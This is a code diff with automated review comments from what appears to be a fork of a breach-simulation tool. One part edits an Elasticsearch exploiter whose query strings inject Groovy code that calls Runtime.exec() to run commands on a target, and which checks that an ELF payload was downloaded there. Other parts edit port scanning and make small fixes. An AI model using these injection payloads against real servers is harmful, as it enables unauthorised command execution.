forked from p15670423/monkey
commit
3f54590785
|
@ -23,7 +23,7 @@ def _cast_by_example(value, example):
|
||||||
"""
|
"""
|
||||||
example_type = type(example)
|
example_type = type(example)
|
||||||
if example_type is str:
|
if example_type is str:
|
||||||
return str(os.path.expandvars(value))
|
return os.path.expandvars(value).encode("utf8")
|
||||||
elif example_type is tuple and len(example) != 0:
|
elif example_type is tuple and len(example) != 0:
|
||||||
if value is None or value == tuple([None]):
|
if value is None or value == tuple([None]):
|
||||||
return tuple()
|
return tuple()
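Review bot: The `str` branch returns `os.path.expandvars(value).encode("utf8")` without checking what `value` is (taking the second line of each printed pair as the new side). If this module targets Python 2, as the encode suggests, a byte `str` holding non-ASCII bytes is implicitly ASCII-decoded before the encode and raises `UnicodeDecodeError`. A `None` or non-string value still fails inside `expandvars`, as it did before the change. Encoding only when needed would cover both input types, e.g. `if isinstance(value, unicode): value = value.encode("utf8")` followed by `return os.path.expandvars(value)`. The docstring should also state that this branch returns a UTF-8 byte string. The body of `_cast_by_example` starts and continues outside the hunk.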
|
||||||
|
|
|
@ -25,11 +25,11 @@ class ElasticGroovyExploiter(HostExploiter):
|
||||||
MONKEY_RESULT_FIELD = "monkey_result"
|
MONKEY_RESULT_FIELD = "monkey_result"
|
||||||
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
|
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
|
||||||
JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
|
JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
|
||||||
JAVA_GET_TMP_DIR =\
|
JAVA_GET_TMP_DIR = \
|
||||||
GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
|
GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
|
||||||
JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
|
JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
|
||||||
JAVA_CMD = GENERIC_QUERY \
|
JAVA_CMD = GENERIC_QUERY \
|
||||||
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
||||||
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||||
|
@ -139,8 +139,8 @@ class ElasticGroovyExploiter(HostExploiter):
|
||||||
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
if (http_thread.downloads != 1) or (
|
if (http_thread.downloads != 1) or (
|
||||||
'ELF' not in
|
'ELF' not in
|
||||||
self.check_if_remote_file_exists_linux(target_path)):
|
self.check_if_remote_file_exists_linux(target_path)):
|
||||||
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||||
return False
|
return False
|
||||||
return True
|
return True
|
||||||
|
@ -232,5 +232,5 @@ class ElasticGroovyExploiter(HostExploiter):
|
||||||
try:
|
try:
|
||||||
json_resp = json.loads(response.text)
|
json_resp = json.loads(response.text)
|
||||||
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
|
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
|
||||||
except KeyError:
|
except (KeyError, IndexError):
|
||||||
return None
|
return None
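Review bot: `json.loads(response.text)` sits inside the `try`, but `except (KeyError, IndexError):` does not cover the `ValueError` it raises when the server answers with a non-JSON body such as an error page or an empty reply. It also misses the `TypeError` raised when one of the indexed fields is `null` or not a container. Widening the handler to `except (KeyError, IndexError, ValueError, TypeError):` keeps the existing return-`None` path for every unusable response, rather than letting the exception escape to the caller. The enclosing method starts outside the hunk, so an outer handler may already exist. If it does, a one-line comment naming where malformed responses are handled would be enough.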
|
||||||
|
|
|
@ -139,7 +139,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
||||||
"On host %s discovered the following ports %s" %
|
"On host %s discovered the following ports %s" %
|
||||||
(str(ip), ",".join([str(s[0]) for s in connected_ports_sockets])))
|
(str(ip), ",".join([str(s[0]) for s in connected_ports_sockets])))
|
||||||
banners = []
|
banners = []
|
||||||
if get_banner:
|
if get_banner and (len(connected_ports_sockets) != 0):
|
||||||
readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0)
|
readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0)
|
||||||
# read first BANNER_READ bytes
|
# read first BANNER_READ bytes
|
||||||
banners = [sock.recv(BANNER_READ) if sock in readable_sockets else ""
|
banners = [sock.recv(BANNER_READ) if sock in readable_sockets else ""
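Review bot: The new guard `if get_banner and (len(connected_ports_sockets) != 0):` has no comment explaining why an empty list must be skipped, and it reads more simply as `if get_banner and connected_ports_sockets:`. I would add `# select() with three empty lists is platform-dependent and fails on Windows` above it so the check is not removed later as redundant. Separately, `sock.recv(BANNER_READ)` runs inside the list comprehension with no error handling visible here, so a reset on one socket would presumably discard the banners already read from the others. The comprehension and the rest of `check_tcp_ports` continue outside the hunk, so confirm whether a surrounding `try` already covers this.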
|
||||||
|
|